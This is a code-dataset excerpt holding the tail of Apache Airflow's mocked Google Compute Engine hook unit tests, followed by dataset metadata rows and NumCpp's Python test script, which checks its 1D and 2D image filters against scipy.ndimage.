def test_patch_instance_group_manager_no_project_id(
self, wait_for_operation_to_complete, get_conn, mock_project_id
):
patch_method = get_conn.return_value.instanceGroupManagers.return_value.patch
execute_method = patch_method.return_value.execute
execute_method.return_value = {"name": "operation_id"}
wait_for_operation_to_complete.return_value = None
with self.assertRaises(AirflowException) as cm:
self.gce_hook_no_project_id.patch_instance_group_manager(
zone=GCE_ZONE,
resource_id=GCE_INSTANCE_GROUP_MANAGER,
body={},
request_id=GCE_REQUEST_ID
)
patch_method.assert_not_called()
execute_method.assert_not_called()
err = cm.exception
self.assertIn("The project id must be passed", str(err))
wait_for_operation_to_complete.assert_not_called()
class TestGcpComputeHookDefaultProjectId(unittest.TestCase):
def setUp(self):
with mock.patch('airflow.contrib.hooks.gcp_api_base_hook.GoogleCloudBaseHook.__init__',
new=mock_base_gcp_hook_default_project_id):
self.gce_hook = GceHook(gcp_conn_id='test')
@mock.patch('airflow.gcp.hooks.compute.GceHook.get_conn')
@mock.patch('airflow.gcp.hooks.compute.GceHook._wait_for_operation_to_complete')
def test_start_instance(self, wait_for_operation_to_complete, get_conn):
start_method = get_conn.return_value.instances.return_value.start
execute_method = start_method.return_value.execute
execute_method.return_value = {"name": "operation_id"}
wait_for_operation_to_complete.return_value = None
res = self.gce_hook.start_instance(
zone=GCE_ZONE,
resource_id=GCE_INSTANCE)
self.assertIsNone(res)
start_method.assert_called_once_with(instance='instance', project='example-project', zone='zone')
execute_method.assert_called_once_with(num_retries=5)
wait_for_operation_to_complete.assert_called_once_with(project_id='example-project',
operation_name='operation_id',
zone='zone')
@mock.patch('airflow.gcp.hooks.compute.GceHook.get_conn')
@mock.patch('airflow.gcp.hooks.compute.GceHook._wait_for_operation_to_complete')
def test_start_instance_overridden_project_id(self, wait_for_operation_to_complete, get_conn):
start_method = get_conn.return_value.instances.return_value.start
execute_method = start_method.return_value.execute
execute_method.return_value = {"name": "operation_id"}
wait_for_operation_to_complete.return_value = None
res = self.gce_hook.start_instance(
project_id='new-project',
zone=GCE_ZONE,
resource_id=GCE_INSTANCE)
self.assertIsNone(res)
start_method.assert_called_once_with(instance='instance', project='new-project', zone='zone')
execute_method.assert_called_once_with(num_retries=5)
wait_for_operation_to_complete.assert_called_once_with(project_id='new-project',
operation_name='operation_id',
zone='zone')
@mock.patch('airflow.gcp.hooks.compute.GceHook.get_conn')
@mock.patch('airflow.gcp.hooks.compute.GceHook._wait_for_operation_to_complete')
def test_stop_instance(self, wait_for_operation_to_complete, get_conn):
stop_method = get_conn.return_value.instances.return_value.stop
execute_method = stop_method.return_value.execute
execute_method.return_value = {"name": "operation_id"}
wait_for_operation_to_complete.return_value = None
res = self.gce_hook.stop_instance(
zone=GCE_ZONE,
resource_id=GCE_INSTANCE)
self.assertIsNone(res)
stop_method.assert_called_once_with(instance='instance', project='example-project', zone='zone')
execute_method.assert_called_once_with(num_retries=5)
wait_for_operation_to_complete.assert_called_once_with(project_id='example-project',
operation_name='operation_id',
zone='zone')
@mock.patch('airflow.gcp.hooks.compute.GceHook.get_conn')
@mock.patch('airflow.gcp.hooks.compute.GceHook._wait_for_operation_to_complete')
def test_stop_instance_overridden_project_id(self, wait_for_operation_to_complete, get_conn):
stop_method = get_conn.return_value.instances.return_value.stop
execute_method = stop_method.return_value.execute
execute_method.return_value = {"name": "operation_id"}
wait_for_operation_to_complete.return_value = None
res = self.gce_hook.stop_instance(
project_id='new-project',
zone=GCE_ZONE,
resource_id=GCE_INSTANCE)
self.assertIsNone(res)
stop_method.assert_called_once_with(instance='instance', project='new-project', zone='zone')
execute_method.assert_called_once_with(num_retries=5)
wait_for_operation_to_complete.assert_called_once_with(project_id='new-project',
operation_name='operation_id',
zone='zone')
@mock.patch('airflow.gcp.hooks.compute.GceHook.get_conn')
@mock.patch('airflow.gcp.hooks.compute.GceHook._wait_for_operation_to_complete')
def test_set_machine_type_instance(self, wait_for_operation_to_complete, get_conn):
execute_method = get_conn.return_value.instances.return_value.setMachineType.return_value.execute
execute_method.return_value = {"name": "operation_id"}
wait_for_operation_to_complete.return_value = None
res = self.gce_hook.set_machine_type(
body={},
zone=GCE_ZONE,
resource_id=GCE_INSTANCE)
self.assertIsNone(res)
execute_method.assert_called_once_with(num_retries=5)
wait_for_operation_to_complete.assert_called_once_with(project_id='example-project',
operation_name='operation_id',
zone='zone')
@mock.patch('airflow.gcp.hooks.compute.GceHook.get_conn')
@mock.patch('airflow.gcp.hooks.compute.GceHook._wait_for_operation_to_complete')
def test_set_machine_type_instance_overridden_project_id(self, wait_for_operation_to_complete, get_conn):
execute_method = get_conn.return_value.instances.return_value.setMachineType.return_value.execute
execute_method.return_value = {"name": "operation_id"}
wait_for_operation_to_complete.return_value = None
res = self.gce_hook.set_machine_type(
project_id='new-project',
body={},
zone=GCE_ZONE,
resource_id=GCE_INSTANCE)
self.assertIsNone(res)
execute_method.assert_called_once_with(num_retries=5)
wait_for_operation_to_complete.assert_called_once_with(project_id='new-project',
operation_name='operation_id',
zone='zone')
@mock.patch('airflow.gcp.hooks.compute.GceHook.get_conn')
@mock.patch('airflow.gcp.hooks.compute.GceHook._wait_for_operation_to_complete')
def test_get_instance_template(self, wait_for_operation_to_complete, get_conn):
get_method = get_conn.return_value.instanceTemplates.return_value.get
execute_method = get_method.return_value.execute
execute_method.return_value = {"name": "operation_id"}
wait_for_operation_to_complete.return_value = None
res = self.gce_hook.get_instance_template(
resource_id=GCE_INSTANCE_TEMPLATE)
self.assertIsNotNone(res)
get_method.assert_called_once_with(instanceTemplate='instance-template', project='example-project')
execute_method.assert_called_once_with(num_retries=5)
wait_for_operation_to_complete.assert_not_called()
@mock.patch('airflow.gcp.hooks.compute.GceHook.get_conn')
@mock.patch('airflow.gcp.hooks.compute.GceHook._wait_for_operation_to_complete')
def test_get_instance_template_overridden_project_id(self, wait_for_operation_to_complete, get_conn):
get_method = get_conn.return_value.instanceTemplates.return_value.get
execute_method = get_method.return_value.execute
execute_method.return_value = {"name": "operation_id"}
wait_for_operation_to_complete.return_value = None
res = self.gce_hook.get_instance_template(
project_id='new-project',
resource_id=GCE_INSTANCE_TEMPLATE)
self.assertIsNotNone(res)
get_method.assert_called_once_with(instanceTemplate='instance-template', project='new-project')
execute_method.assert_called_once_with(num_retries=5)
wait_for_operation_to_complete.assert_not_called()
@mock.patch('airflow.gcp.hooks.compute.GceHook.get_conn')
@mock.patch('airflow.gcp.hooks.compute.GceHook._wait_for_operation_to_complete')
def test_insert_instance_template(self, wait_for_operation_to_complete, get_conn):
insert_method = get_conn.return_value.instanceTemplates.return_value.insert
execute_method = insert_method.return_value.execute
execute_method.return_value = {"name": "operation_id"}
wait_for_operation_to_complete.return_value = None
res = self.gce_hook.insert_instance_template(
body={},
request_id=GCE_REQUEST_ID
)
self.assertIsNone(res)
insert_method.assert_called_once_with(body={}, project='example-project', requestId='request_id')
execute_method.assert_called_once_with(num_retries=5)
wait_for_operation_to_complete.assert_called_once_with(project_id='example-project',
operation_name='operation_id')
@mock.patch('airflow.gcp.hooks.compute.GceHook.get_conn')
@mock.patch('airflow.gcp.hooks.compute.GceHook._wait_for_operation_to_complete')
def test_insert_instance_template_overridden_project_id(self, wait_for_operation_to_complete, get_conn):
insert_method = get_conn.return_value.instanceTemplates.return_value.insert
execute_method = insert_method.return_value.execute
execute_method.return_value = {"name": "operation_id"}
wait_for_operation_to_complete.return_value = None
res = self.gce_hook.insert_instance_template(
project_id='new-project',
body={},
request_id=GCE_REQUEST_ID
)
self.assertIsNone(res)
insert_method.assert_called_once_with(body={}, project='new-project', requestId='request_id')
execute_method.assert_called_once_with(num_retries=5)
wait_for_operation_to_complete.assert_called_once_with(project_id='new-project',
operation_name='operation_id')
@mock.patch('airflow.gcp.hooks.compute.GceHook.get_conn')
@mock.patch('airflow.gcp.hooks.compute.GceHook._wait_for_operation_to_complete')
def test_get_instance_group_manager(self, wait_for_operation_to_complete, get_conn):
get_method = get_conn.return_value.instanceGroupManagers.return_value.get
execute_method = get_method.return_value.execute
execute_method.return_value = {"name": "operation_id"}
wait_for_operation_to_complete.return_value = None
res = self.gce_hook.get_instance_group_manager(
zone=GCE_ZONE,
resource_id=GCE_INSTANCE_GROUP_MANAGER
)
self.assertIsNotNone(res)
get_method.assert_called_once_with(instanceGroupManager='instance_group_manager',
project='example-project',
zone='zone')
execute_method.assert_called_once_with(num_retries=5)
wait_for_operation_to_complete.assert_not_called()
@mock.patch('airflow.gcp.hooks.compute.GceHook.get_conn')
@mock.patch('airflow.gcp.hooks.compute.GceHook._wait_for_operation_to_complete')
def test_get_instance_group_manager_overridden_project_id(self, wait_for_operation_to_complete, get_conn):
get_method = get_conn.return_value.instanceGroupManagers.return_value.get
execute_method = get_method.return_value.execute
execute_method.return_value = {"name": "operation_id"}
wait_for_operation_to_complete.return_value = None
res = self.gce_hook.get_instance_group_manager(
project_id='new-project',
zone=GCE_ZONE,
resource_id=GCE_INSTANCE_GROUP_MANAGER
)
self.assertIsNotNone(res)
get_method.assert_called_once_with(instanceGroupManager='instance_group_manager',
project='new-project',
zone='zone')
execute_method.assert_called_once_with(num_retries=5)
wait_for_operation_to_complete.assert_not_called()
@mock.patch('airflow.gcp.hooks.compute.GceHook.get_conn')
@mock.patch('airflow.gcp.hooks.compute.GceHook._wait_for_operation_to_complete')
def test_patch_instance_group_manager(self, wait_for_operation_to_complete, get_conn):
patch_method = get_conn.return_value.instanceGroupManagers.return_value.patch
execute_method = patch_method.return_value.execute
execute_method.return_value = {"name": "operation_id"}
wait_for_operation_to_complete.return_value = None
res = self.gce_hook.patch_instance_group_manager(
zone=GCE_ZONE,
resource_id=GCE_INSTANCE_GROUP_MANAGER,
body={},
request_id=GCE_REQUEST_ID
)
self.assertIsNone(res)
patch_method.assert_called_once_with(
body={},
instanceGroupManager='instance_group_manager',
project='example-project',
requestId='request_id',
zone='zone'
)
execute_method.assert_called_once_with(num_retries=5)
wait_for_operation_to_complete.assert_called_once_with(operation_name='operation_id',
project_id='example-project',
zone='zone')
@mock.patch('airflow.gcp.hooks.compute.GceHook.get_conn')
@mock.patch('airflow.gcp.hooks.compute.GceHook._wait_for_operation_to_complete')
def test_patch_instance_group_manager_overridden_project_id(self,
wait_for_operation_to_complete,
get_conn):
patch_method = get_conn.return_value.instanceGroupManagers.return_value.patch
execute_method = patch_method.return_value.execute
execute_method.return_value = {"name": "operation_id"}
wait_for_operation_to_complete.return_value = None
res = self.gce_hook.patch_instance_group_manager(
project_id='new-project',
zone=GCE_ZONE,
resource_id=GCE_INSTANCE_GROUP_MANAGER,
body={},
request_id=GCE_REQUEST_ID
)
self.assertIsNone(res)
patch_method.assert_called_once_with(
body={},
instanceGroupManager='instance_group_manager',
project='new-project',
requestId='request_id',
zone='zone'
)
execute_method.assert_called_once_with(num_retries=5)
wait_for_operation_to_complete.assert_called_once_with(operation_name='operation_id',
project_id='new-project',
zone='zone')
@mock.patch('airflow.gcp.hooks.compute.GceHook.get_conn')
@mock.patch('airflow.gcp.hooks.compute.GceHook._check_global_operation_status')
def test_wait_for_operation_to_complete_no_zone(self, mock_operation_status, mock_get_conn):
service = "test-service"
project_id = "test-project"
operation_name = "test-operation"
num_retries = self.gce_hook.num_retries
# Test success
mock_get_conn.return_value = service
mock_operation_status.return_value = {'status': GceOperationStatus.DONE, 'error': None}
self.gce_hook._wait_for_operation_to_complete(project_id=project_id,
operation_name=operation_name,
zone=None
)
mock_operation_status.assert_called_once_with(service=service,
operation_name=operation_name,
project_id=project_id,
num_retries=num_retries
)
@mock.patch('airflow.gcp.hooks.compute.GceHook.get_conn')
@mock.patch('airflow.gcp.hooks.compute.GceHook._check_global_operation_status')
def test_wait_for_operation_to_complete_no_zone_error(self, mock_operation_status, mock_get_conn):
service = "test-service"
project_id = "test-project"
operation_name = "test-operation"
# Test error
mock_get_conn.return_value = service
mock_operation_status.return_value = {'status': GceOperationStatus.DONE,
'error': {'errors': "some nasty errors"},
'httpErrorStatusCode': 400,
'httpErrorMessage': 'sample msg'
}
with self.assertRaises(AirflowException):
self.gce_hook._wait_for_operation_to_complete(project_id=project_id,
operation_name=operation_name,
zone=None
)
@mock.patch('airflow.gcp.hooks.compute.GceHook.get_conn')
@mock.patch('airflow.gcp.hooks.compute.GceHook._check_zone_operation_status')
def test_wait_for_operation_to_complete_with_zone(self, mock_operation_status, mock_get_conn):
service = "test-service"
project_id = "test-project"
operation_name = "test-operation"
zone = 'west-europe3'
num_retries = self.gce_hook.num_retries
# Test success
mock_get_conn.return_value = service
mock_operation_status.return_value = {'status': GceOperationStatus.DONE, 'error': None}
self.gce_hook._wait_for_operation_to_complete(project_id=project_id,
operation_name=operation_name,
zone=zone
)
mock_operation_status.assert_called_once_with(service, operation_name, project_id, zone, num_retries)
| 53.807976 | 110 | 0.674783 | 4,287 | 36,428 | 5.296944 | 0.04362 | 0.074115 | 0.083143 | 0.093535 | 0.942619 | 0.939317 | 0.934737 | 0.932931 | 0.923507 | 0.914435 | 0 | 0.00109 | 0.244592 | 36,428 | 676 | 111 | 53.887574 | 0.824115 | 0.023114 | 0 | 0.822076 | 0 | 0 | 0.170599 | 0.115063 | 0 | 0 | 0 | 0 | 0.197694 | 1 | 0.054366 | false | 0.011532 | 0.008237 | 0 | 0.065898 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
31a22b22ec48128afb9b874ab0675418b2cbb89b | 19,350 | py | Python | unitTests/testScripts/TestFilters.py | JinchengKim/NumCpp | fd0221edc736baaf3370447fc37dace87800813d | [
"MIT"
] | null | null | null | unitTests/testScripts/TestFilters.py | JinchengKim/NumCpp | fd0221edc736baaf3370447fc37dace87800813d | [
"MIT"
] | null | null | null | unitTests/testScripts/TestFilters.py | JinchengKim/NumCpp | fd0221edc736baaf3370447fc37dace87800813d | [
"MIT"
] | null | null | null | import numpy as np
from termcolor import colored
import scipy.ndimage.filters as filters
import sys
if sys.platform == 'linux':
sys.path.append(r'../lib')
else:
sys.path.append(r'../build/x64/Release')
import NumCpp
####################################################################################
def doTest():
print(colored('Testing Filters', 'magenta'))
test1D()
test2D()
####################################################################################
def test1D():
modes = {'reflect' : NumCpp.Mode.REFLECT,
'constant': NumCpp.Mode.CONSTANT,
'nearest': NumCpp.Mode.NEAREST,
'mirror': NumCpp.Mode.MIRROR,
'wrap': NumCpp.Mode.WRAP}
for mode in modes.keys():
print(colored(f'Testing complementaryMedianFilter1d: mode = {mode}', 'cyan'))
size = np.random.randint(1000, 2000, [1,]).item()
cShape = NumCpp.Shape(1, size)
cArray = NumCpp.NdArray(cShape)
data = np.random.randint(100, 1000, [size,])
cArray.setArray(data)
kernalSize = 0
while kernalSize % 2 == 0:
kernalSize = np.random.randint(5, 15)
constantValue = np.random.randint(0, 5, [1,]).item() # only actaully needed for constant boundary condition
dataOutC = NumCpp.complementaryMedianFilter1d(cArray, kernalSize, modes[mode], constantValue).getNumpyArray().flatten()
dataOutPy = data - filters.generic_filter(data, np.median, footprint=np.ones([kernalSize,]), mode=mode, cval=constantValue)
if np.array_equal(dataOutC, dataOutPy):
print(colored('\tPASS', 'green'))
else:
print(colored('\tFAIL', 'red'))
print(colored(f'Testing convolve1d: mode = {mode}', 'cyan'))
size = np.random.randint(1000, 2000, [1,]).item()
cShape = NumCpp.Shape(1, size)
cArray = NumCpp.NdArray(cShape)
data = np.random.randint(100, 1000, [size,]).astype(np.double)
cArray.setArray(data)
kernalSize = 0
while kernalSize % 2 == 0:
kernalSize = np.random.randint(5, 15)
weights = np.random.randint(1, 5, [kernalSize,])
cWeights = NumCpp.NdArray(1, kernalSize)
cWeights.setArray(weights)
constantValue = np.random.randint(0, 5, [1,]).item() # only actaully needed for constant boundary condition
dataOutC = NumCpp.convolve1d(cArray, cWeights, modes[mode], constantValue).getNumpyArray().flatten()
dataOutPy = filters.convolve(data, weights, mode=mode, cval=constantValue)
if np.array_equal(np.round(dataOutC, 8), np.round(dataOutPy, 8)):
print(colored('\tPASS', 'green'))
else:
print(colored('\tFAIL', 'red'))
print(colored(f'Testing gaussianFilter1d: mode = {mode}', 'cyan'))
size = np.random.randint(1000, 2000, [1,]).item()
cShape = NumCpp.Shape(1, size)
cArray = NumCpp.NdArray(cShape)
data = np.random.randint(100, 1000, [size,]).astype(np.double)
cArray.setArray(data)
kernalSize = 0
while kernalSize % 2 == 0:
kernalSize = np.random.randint(5, 15)
sigma = np.random.rand(1).item() * 2
constantValue = np.random.randint(0, 5, [1,]).item() # only actaully needed for constant boundary condition
dataOutC = NumCpp.gaussianFilter1d(cArray, sigma, modes[mode], constantValue).getNumpyArray().flatten()
dataOutPy = filters.gaussian_filter(data, sigma, mode=mode, cval=constantValue)
if np.array_equal(np.round(dataOutC, 7), np.round(dataOutPy, 7)):
print(colored('\tPASS', 'green'))
else:
print(colored('\tFAIL', 'red'))
print(colored(f'Testing maximumFilter1d: mode = {mode}', 'cyan'))
size = np.random.randint(1000, 2000, [1,]).item()
cShape = NumCpp.Shape(1, size)
cArray = NumCpp.NdArray(cShape)
data = np.random.randint(100, 1000, [size,])
cArray.setArray(data)
kernalSize = 0
while kernalSize % 2 == 0:
kernalSize = np.random.randint(5, 15)
constantValue = np.random.randint(0, 5, [1,]).item() # only actaully needed for constant boundary condition
dataOutC = NumCpp.maximumFilter1d(cArray, kernalSize, modes[mode], constantValue).getNumpyArray().flatten()
dataOutPy = filters.generic_filter(data, np.max, footprint=np.ones([kernalSize,]), mode=mode, cval=constantValue)
if np.array_equal(dataOutC, dataOutPy):
print(colored('\tPASS', 'green'))
else:
print(colored('\tFAIL', 'red'))
print(colored(f'Testing medianFilter1d: mode = {mode}', 'cyan'))
size = np.random.randint(1000, 2000, [1,]).item()
cShape = NumCpp.Shape(1, size)
cArray = NumCpp.NdArray(cShape)
data = np.random.randint(100, 1000, [size,])
cArray.setArray(data)
kernalSize = 0
while kernalSize % 2 == 0:
kernalSize = np.random.randint(5, 15)
constantValue = np.random.randint(0, 5, [1,]).item() # only actaully needed for constant boundary condition
dataOutC = NumCpp.medianFilter1d(cArray, kernalSize, modes[mode], constantValue).getNumpyArray().flatten()
dataOutPy = filters.generic_filter(data, np.median, footprint=np.ones([kernalSize,]), mode=mode, cval=constantValue)
if np.array_equal(dataOutC, dataOutPy):
print(colored('\tPASS', 'green'))
else:
print(colored('\tFAIL', 'red'))
print(colored(f'Testing minumumFilter1d: mode = {mode}', 'cyan'))
size = np.random.randint(1000, 2000, [1,]).item()
cShape = NumCpp.Shape(1, size)
cArray = NumCpp.NdArray(cShape)
data = np.random.randint(100, 1000, [size,])
cArray.setArray(data)
kernalSize = 0
while kernalSize % 2 == 0:
kernalSize = np.random.randint(5, 15)
constantValue = np.random.randint(0, 5, [1,]).item() # only actaully needed for constant boundary condition
dataOutC = NumCpp.minumumFilter1d(cArray, kernalSize, modes[mode], constantValue).getNumpyArray().flatten()
dataOutPy = filters.generic_filter(data, np.min, footprint=np.ones([kernalSize,]), mode=mode, cval=constantValue)
if np.array_equal(dataOutC, dataOutPy):
print(colored('\tPASS', 'green'))
else:
print(colored('\tFAIL', 'red'))
print(colored(f'Testing percentileFilter1d: mode = {mode}', 'cyan'))
size = np.random.randint(1000, 2000, [1,]).item()
cShape = NumCpp.Shape(1, size)
cArray = NumCpp.NdArray(cShape)
data = np.random.randint(100, 1000, [size,]).astype(np.double)
cArray.setArray(data)
kernalSize = 0
while kernalSize % 2 == 0:
kernalSize = np.random.randint(5, 15)
percentile = np.random.randint(0, 101, [1,]).item()
constantValue = np.random.randint(0, 5, [1,]).item() # only actaully needed for constant boundary condition
dataOutC = NumCpp.percentileFilter1d(cArray, kernalSize, percentile, modes[mode], constantValue).getNumpyArray().flatten()
dataOutPy = filters.generic_filter(data, np.percentile, footprint=np.ones([kernalSize,]), mode=mode, cval=constantValue, extra_arguments=(percentile,))
if np.array_equal(np.round(dataOutC, 7), np.round(dataOutPy, 7)):
print(colored('\tPASS', 'green'))
else:
print(colored('\tFAIL', 'red'))
print(colored(f'Testing rankFilter1d: mode = {mode}', 'cyan'))
size = np.random.randint(1000, 2000, [1,]).item()
cShape = NumCpp.Shape(1, size)
cArray = NumCpp.NdArray(cShape)
data = np.random.randint(100, 1000, [size,]).astype(np.double)
cArray.setArray(data)
kernalSize = 0
while kernalSize % 2 == 0:
kernalSize = np.random.randint(5, 15)
rank = np.random.randint(0, kernalSize - 1, [1, ]).item()
constantValue = np.random.randint(0, 5, [1,]).item() # only actaully needed for constant boundary condition
dataOutC = NumCpp.rankFilter1d(cArray, kernalSize, rank, modes[mode], constantValue).getNumpyArray().flatten()
dataOutPy = filters.rank_filter(data, rank, footprint=np.ones([kernalSize,]), mode=mode, cval=constantValue)
if np.array_equal(dataOutC, dataOutPy):
print(colored('\tPASS', 'green'))
else:
print(colored('\tFAIL', 'red'))
print(colored(f'Testing uniformFilter1d: mode = {mode}', 'cyan'))
size = np.random.randint(1000, 2000, [1,]).item()
cShape = NumCpp.Shape(1, size)
cArray = NumCpp.NdArray(cShape)
data = np.random.randint(100, 1000, [size,]).astype(np.double)
cArray.setArray(data)
kernalSize = 0
while kernalSize % 2 == 0:
kernalSize = np.random.randint(5, 15)
constantValue = np.random.randint(0, 5, [1,]).item() # only actaully needed for constant boundary condition
dataOutC = NumCpp.uniformFilter1d(cArray, kernalSize, modes[mode], constantValue).getNumpyArray().flatten()
dataOutPy = filters.generic_filter(data, np.mean, footprint=np.ones([kernalSize,]), mode=mode, cval=constantValue)
if np.array_equal(dataOutC, dataOutPy):
print(colored('\tPASS', 'green'))
else:
print(colored('\tFAIL', 'red'))
####################################################################################
def test2D():
modes = {'reflect' : NumCpp.Mode.REFLECT,
'constant': NumCpp.Mode.CONSTANT,
'nearest': NumCpp.Mode.NEAREST,
'mirror': NumCpp.Mode.MIRROR,
'wrap': NumCpp.Mode.WRAP}
for mode in modes.keys():
print(colored(f'Testing complementaryMedianFilter: mode = {mode}', 'cyan'))
shape = np.random.randint(1000, 2000, [2,]).tolist()
cShape = NumCpp.Shape(shape[0], shape[1])
cArray = NumCpp.NdArray(cShape)
data = np.random.randint(100, 1000, shape)
cArray.setArray(data)
kernalSize = 0
while kernalSize % 2 == 0:
kernalSize = np.random.randint(5, 15)
constantValue = np.random.randint(0, 5, [1,]).item() # only actaully needed for constant boundary condition
dataOutC = NumCpp.complementaryMedianFilter(cArray, kernalSize, modes[mode], constantValue).getNumpyArray()
dataOutPy = data - filters.median_filter(data, size=kernalSize, mode=mode, cval=constantValue)
if np.array_equal(dataOutC, dataOutPy):
print(colored('\tPASS', 'green'))
else:
print(colored('\tFAIL', 'red'))
print(colored(f'Testing convolve: mode = {mode}', 'cyan'))
shape = np.random.randint(1000, 2000, [2,]).tolist()
cShape = NumCpp.Shape(shape[0], shape[1])
cArray = NumCpp.NdArray(cShape)
data = np.random.randint(10, 20, shape).astype(np.double)
cArray.setArray(data)
kernalSize = 0
while kernalSize % 2 == 0:
kernalSize = np.random.randint(5, 15)
constantValue = np.random.randint(0, 5, [1,]).item() # only actaully needed for constant boundary condition
weights = np.random.randint(-2, 3, [kernalSize, kernalSize]).astype(np.double)
cWeights = NumCpp.NdArray(kernalSize)
cWeights.setArray(weights)
dataOutC = NumCpp.convolve(cArray, kernalSize, cWeights, modes[mode], constantValue).getNumpyArray()
dataOutPy = filters.convolve(data, weights, mode=mode, cval=constantValue)
if np.array_equal(dataOutC, dataOutPy):
print(colored('\tPASS', 'green'))
else:
print(colored('\tFAIL', 'red'))
print(colored(f'Testing gaussianFilter: mode = {mode}', 'cyan'))
shape = np.random.randint(1000, 2000, [2,]).tolist()
cShape = NumCpp.Shape(shape[0], shape[1])
cArray = NumCpp.NdArray(cShape)
data = np.random.randint(100, 1000, shape).astype(np.double)
cArray.setArray(data)
constantValue = np.random.randint(0, 5, [1,]).item() # only actaully needed for constant boundary condition
sigma = np.random.rand(1).item() * 2
dataOutC = NumCpp.gaussianFilter(cArray, sigma, modes[mode], constantValue).getNumpyArray()
dataOutPy = filters.gaussian_filter(data, sigma, mode=mode, cval=constantValue)
if np.array_equal(np.round(dataOutC, 2), np.round(dataOutPy, 2)):
print(colored('\tPASS', 'green'))
else:
print(colored('\tFAIL', 'red'))
print(colored(f'Testing laplaceFilter: mode = {mode}', 'cyan'))
shape = np.random.randint(1000, 2000, [2,]).tolist()
cShape = NumCpp.Shape(shape[0], shape[1])
cArray = NumCpp.NdArray(cShape)
data = np.random.randint(100, 1000, shape).astype(np.double)
cArray.setArray(data)
constantValue = np.random.randint(0, 5, [1,]).item() # only actaully needed for constant boundary condition
dataOutC = NumCpp.laplaceFilter(cArray, modes[mode], constantValue).getNumpyArray()
dataOutPy = filters.laplace(data, mode=mode, cval=constantValue)
if np.array_equal(dataOutC, dataOutPy):
print(colored('\tPASS', 'green'))
else:
print(colored('\tFAIL', 'red'))
print(colored(f'Testing maximumFilter: mode = {mode}', 'cyan'))
shape = np.random.randint(1000, 2000, [2,]).tolist()
cShape = NumCpp.Shape(shape[0], shape[1])
cArray = NumCpp.NdArray(cShape)
data = np.random.randint(100, 1000, shape)
cArray.setArray(data)
kernalSize = 0
while kernalSize % 2 == 0:
kernalSize = np.random.randint(5, 15)
constantValue = np.random.randint(0, 5, [1,]).item() # only actaully needed for constant boundary condition
dataOutC = NumCpp.maximumFilter(cArray, kernalSize, modes[mode], constantValue).getNumpyArray()
dataOutPy = filters.maximum_filter(data, size=kernalSize, mode=mode, cval=constantValue)
if np.array_equal(dataOutC, dataOutPy):
print(colored('\tPASS', 'green'))
else:
print(colored('\tFAIL', 'red'))
print(colored(f'Testing medianFilter: mode = {mode}', 'cyan'))
shape = np.random.randint(1000, 2000, [2,]).tolist()
cShape = NumCpp.Shape(shape[0], shape[1])
cArray = NumCpp.NdArray(cShape)
data = np.random.randint(100, 1000, shape)
cArray.setArray(data)
kernalSize = 0
while kernalSize % 2 == 0:
kernalSize = np.random.randint(5, 15)
constantValue = np.random.randint(0, 5, [1,]).item() # only actaully needed for constant boundary condition
dataOutC = NumCpp.medianFilter(cArray, kernalSize, modes[mode], constantValue).getNumpyArray()
dataOutPy = filters.median_filter(data, size=kernalSize, mode=mode, cval=constantValue)
if np.array_equal(dataOutC, dataOutPy):
print(colored('\tPASS', 'green'))
else:
print(colored('\tFAIL', 'red'))
print(colored(f'Testing minimumFilter: mode = {mode}', 'cyan'))
shape = np.random.randint(1000, 2000, [2,]).tolist()
cShape = NumCpp.Shape(shape[0], shape[1])
cArray = NumCpp.NdArray(cShape)
data = np.random.randint(100, 1000, shape)
cArray.setArray(data)
kernalSize = 0
while kernalSize % 2 == 0:
kernalSize = np.random.randint(5, 15)
constantValue = np.random.randint(0, 5, [1,]).item() # only actaully needed for constant boundary condition
dataOutC = NumCpp.minimumFilter(cArray, kernalSize, modes[mode], constantValue).getNumpyArray()
dataOutPy = filters.minimum_filter(data, size=kernalSize, mode=mode, cval=constantValue)
if np.array_equal(dataOutC, dataOutPy):
print(colored('\tPASS', 'green'))
else:
print(colored('\tFAIL', 'red'))
print(colored(f'Testing percentileFilter: mode = {mode}', 'cyan'))
shape = np.random.randint(1000, 2000, [2,]).tolist()
cShape = NumCpp.Shape(shape[0], shape[1])
cArray = NumCpp.NdArray(cShape)
data = np.random.randint(100, 1000, shape)
cArray.setArray(data)
kernalSize = 0
while kernalSize % 2 == 0:
kernalSize = np.random.randint(5, 15)
percentile = np.random.randint(0, 101, [1,]).item()
constantValue = np.random.randint(0, 5, [1,]).item() # only actaully needed for constant boundary condition
dataOutC = NumCpp.percentileFilter(cArray, kernalSize, percentile, modes[mode], constantValue).getNumpyArray()
dataOutPy = filters.percentile_filter(data, percentile, size=kernalSize, mode=mode, cval=constantValue)
if np.array_equal(dataOutC, dataOutPy):
print(colored('\tPASS', 'green'))
else:
print(colored('\tFAIL', 'red'))
print(colored(f'Testing rankFilter: mode = {mode}', 'cyan'))
shape = np.random.randint(1000, 2000, [2,]).tolist()
cShape = NumCpp.Shape(shape[0], shape[1])
cArray = NumCpp.NdArray(cShape)
data = np.random.randint(100, 1000, shape)
cArray.setArray(data)
kernalSize = 0
while kernalSize % 2 == 0:
kernalSize = np.random.randint(5, 15)
rank = np.random.randint(0, kernalSize**2 - 1, [1,]).item()
constantValue = np.random.randint(0, 5, [1,]).item() # only actaully needed for constant boundary condition
dataOutC = NumCpp.rankFilter(cArray, kernalSize, rank, modes[mode], constantValue).getNumpyArray()
dataOutPy = filters.rank_filter(data, rank, size=kernalSize, mode=mode, cval=constantValue)
if np.array_equal(dataOutC, dataOutPy):
print(colored('\tPASS', 'green'))
else:
print(colored('\tFAIL', 'red'))
print(colored(f'Testing uniformFilter: mode = {mode}', 'cyan'))
shape = np.random.randint(1000, 2000, [2,]).tolist()
cShape = NumCpp.Shape(shape[0], shape[1])
cArray = NumCpp.NdArray(cShape)
data = np.random.randint(100, 1000, shape).astype(np.double)
cArray.setArray(data)
kernalSize = 0
while kernalSize % 2 == 0:
kernalSize = np.random.randint(5, 15)
constantValue = np.random.randint(0, 5, [1,]).item() # only actaully needed for constant boundary condition
dataOutC = NumCpp.uniformFilter(cArray, kernalSize, modes[mode], constantValue).getNumpyArray()
dataOutPy = filters.uniform_filter(data, size=kernalSize, mode=mode, cval=constantValue)
if np.array_equal(np.round(dataOutC, 8), np.round(dataOutPy, 8)):
print(colored('\tPASS', 'green'))
else:
print(colored('\tFAIL', 'red'))
####################################################################################
if __name__ == '__main__':
# test1D()
# test2D()
doTest()
